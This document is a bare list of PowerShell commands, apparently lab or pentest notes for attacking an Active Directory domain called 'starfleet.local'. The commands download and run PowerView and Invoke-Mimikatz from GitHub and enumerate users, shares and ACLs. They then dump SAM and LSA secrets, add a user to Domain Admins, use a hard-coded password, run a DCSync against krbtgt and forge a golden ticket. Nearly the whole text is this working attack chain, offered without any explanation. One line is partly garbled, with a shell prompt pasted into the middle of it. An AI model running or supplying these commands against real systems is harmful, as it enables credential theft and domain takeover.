Set-ExecutionPolicy unrestricted
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/PowerView.ps1')
get-netuser | select cn
get-netuser | select -ExpandProperty samaccountanme
Find-UserField -SearchField description
Get-NetGroup -UserName s.chisholm
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -OperatingSystem "*Windows 10*"
Get-NetComputer -OperatingSystem "*Windows Server*"
Invoke-ShareFinder
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
Invoke-EnumerateLocalAdmin
Get-NetGPO
Get-NetGPO | Select displayname
Get-ObjectAcl -SamAccountName "engineering" -ResolveGUIDs
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Nexxsys/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command token::elevate
Invoke-Mimikatz -Command lsadump::sam
Invoke-Mimikatz -Command lsadump::secrets
runas /user:j.taylor "powershell.exe"
net group "domain admins" j.taylor /add /domain
$password = ConvertTo-SecureString "Lexington1776!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("starfleet\j.taylor", $password)
Enter-PSSession -ComputerName dc01 -Credential $cred
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Nexxsys/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:starfleet.local /user:krbtgt"'
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/PowerView.ps1')
Get-DomainSID -Domain STARFLEET.local](<PS C:\Users\s.chisholm.STARFLEET%3E Get-DomainSID -Domain STARFLEET.local
Invoke-Mimikatz -Command '"kerberos::golden /User:administrator /domain:STARFLEET.local /sid:<DOMAIN SID> /krbtgt:<NTLMHash> /ptt"'